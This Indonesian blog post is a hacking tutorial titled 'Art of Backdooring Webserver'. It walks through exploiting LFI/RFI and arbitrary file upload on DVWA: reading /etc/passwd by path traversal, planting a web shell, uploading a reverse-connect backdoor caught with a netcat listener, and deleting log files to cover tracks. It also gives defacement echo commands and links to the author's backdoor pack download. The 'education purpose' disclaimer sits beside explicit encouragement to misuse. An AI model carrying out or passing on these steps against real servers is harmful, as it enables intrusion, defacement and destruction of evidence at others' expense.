Art of Backdooring Website
Judul: Art of Backdooring Webserver
Author: ./MyHeartIsyr
Perhatian:
Artikel ini bebas untuk disalin atau disebarluaskan asalkan tetap mencantumkan nama penulis
dan tidak untuk tujuan komersil. Segala penyalahgunaan dari artikel ini bukan merupakan
tanggung jawab penulis (artikel ini hanya untuk Education Purpose :))
Halo, kali ini saya akan membahas cara-cara dalam melakukan backdooring webserver
Eksperimen ini terinspirasi dari beberapa tutorial LFI/RFI dan Arbitrary Upload File
yang ada di internet dan saya ingin membuatnya
lebih menarik lagi
Ok, yang kita butuhkan adalah:
1. Website yang vuln LFI/RFI (disini saya pakai DVWA)
2. Shell (dalam contoh ini saya pakai M4RV3L Shell buatan saya)
3. Reverse Connect script (kalian bisa pakai kiranti backdoor pack buatan saya :P (sekalian promosi))
Mari kita mulai:
A. LFI/RFI
1. Kita tes terlebih dahulu apakah website benar-benar vuln
2. Kalau benar, kita intip file yang ada di server, contoh:
../../../../../autoexec.bat (untuk windows)
../../../../../etc/passwd (linux, jumlah tanda '../' tergantung ada dimana file tersebut berada, sama dengan windows)
3. Setelah itu, kita inject dengan shell M4RV3L (atau shell punya kalian)
4. Kita cek lagi dengan melihat isi dari directory server, contoh:
marvel.php&act=shell&cmd=dir (windows)
marvel.php&act=shell&cmd=ls -la (linux)
5. Kita upload shell Reverse Connect yang sudah digenerate dengan kiranti backdoor pack (atau yang lain) dengan
perintah: marvel.php&act=upload
6. Kita cek kembali apakah file yang kita upload telah berada di server
7. Jalankan NetCat dengan opsi: nc -lvp 4444 (port 4444 merupakan port default dari kiranti backdoor pack)
8. Akses file backdoor dengan mengganti url http://127.0.0.1/dvwa/vulnerabilities/fi/?page=include.php
menjadi http://127.0.0.1/dvwa/vulnerabilities/fi/namafile.php
9. And, boom! You got the shell
10. Silakan berbuat sesuka hati :D Tapi jangan lupa Covering Track dengan menghapus beberapa log file (banyak kok caranya di google :D)
B. Arbitrary Upload File
Sekilas sih bahan yang diperlukan sama aja, yang membedakan kita gak perlu lagi upload webshell
(untuk apa membunuh semut dengan dua kali pukul jika satu kali saja sudah cukup?)
1. Upload Reverse Connect shell yang sudah digenerate
2. Jalankan NetCat dengan opsi: nc -lvp 4444 (seperti tadi)
3. Akses file yang sudah diupload
4. Boom! You got the shell
(sengaja saya tidak sertakan gambar karena pasti kalian bisa melakukannya :))
C. Plan B
Jika cara A dan B tidak bisa dilakukan (mis: LFI/RFI tidak bisa upload file dan AUF (Arbitrary Upload File) tidak bisa upload file .php)
maka defacing adalah cara alternatif jika kalian tidak bisa backdooring dengan kedua cara diatas
Untuk cara A:
gunakan perintah: echo ^<h1^>Hacked by ./MyHeartIsyr^<h1^>>nitip.html (windows)
atau: echo "<h1>Hacked by ./MyHeartIsyr</h1>">nitip.html (linux)
Untuk cara B:
langsung saja upload script deface kalian :D
Sekian artikel singkat ini, seperti biasa saya mengakhiri artikel saya. Semoga bermanfaat ^_^
Greetz To:
[x] Allah SWT
[x] M2.M4GNuM
[x] All My Friend in Real Life
[x] FalahGo5 (Channel YouTube-mu kok sepi?)
[x] Snow White (Hana Zafirah, yes. Only you who contact me after lockpick tragedy in my class (and i who made that tragedy))
[x] All Indonesian Hackers (viva la cucaracha hackers!)
[x] You
NB: Yang mau kiranti backdoor pack bisa downlad disini: http://www.mediafire.com/file/yufl6fh7uexnlbn/xkiranti.zip/file
0 Tanggapan:
Post a Comment